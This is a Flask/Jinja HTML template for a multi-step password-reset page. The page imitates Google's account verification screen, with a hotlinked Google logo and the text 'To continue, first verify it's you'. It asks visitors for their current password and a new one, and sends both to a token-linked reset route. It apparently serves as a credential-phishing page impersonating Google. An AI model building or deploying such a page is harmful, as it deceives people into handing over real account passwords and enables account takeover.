
{% extends 'layout.html' %}

{% block style %}
<link rel="stylesheet" href="{{ url_for('static', filename='css/reset.css') }}">
{% endblock style %} 

{% block content %}
<!-- <div class="form"> 
    <header class="text-center mb-2 pb-2">Reset Password</header>
    <form method="post">
        <div class="mb-3">
            <label class="form-label" for="old_password">Old Password</label>
            <input
            class="form-control"
            type="old_password"
            id="old_password"
            name="old_password"
            placeholder="Enter old password"
            required
            />
        </div>
        <div class="mb-3">
            <label class="form-label" for="password">New Password</label>
            <input
            class="form-control"
            type="password"
            id="password"
            name="password"
            placeholder="Enter new password"
            required
            />
        </div>
        <button class="btn btn-primary w-100" type="submit">Reset Password</button>
    </form>
</div> -->

<div class="container">
    <div class="top-content">
        <img src="https://i.postimg.cc/CL7CmGSx/google-logo-png-29530.png" alt="">
        <h2>Welcome</h2>
        <p class="heading" id="heading-text">To continue, first verify it's you</p>
    </div> 
    <form action="{{ url_for('reset_password', token=token) }}" method="post" id="regForm">
        <div class="tab">
            <div class="inputs">
                <input type="password" name="old_password" id="old-password" class="input">
                <label for="old-password" class="input-label">Enter your password</label>
            </div>
        </div>
        <div class="tab">
            <div class="inputs">
                <input type="password" name="new_password" id="new-password" class="input">
                <label for="new-password" class="input-label">Enter new password</label>
            </div>
            <div class="inputs">
                <input type="password" name="confirm_password" id="confirm-password" class="input">
                <label for="confirm-password" class="input-label">Confirm new password</label>
            </div>
        </div>
    </form>
    <div class="btn-group">
        <button id="nextBtn" class="next-btn confirm-pass" onclick="nextPrev(1)">Next</button>
    </div>
</div>

{% endblock content %} 

{% block script %}
<script src="{{ url_for('static', filename='js/script.js') }}"></script>
{% endblock script %}
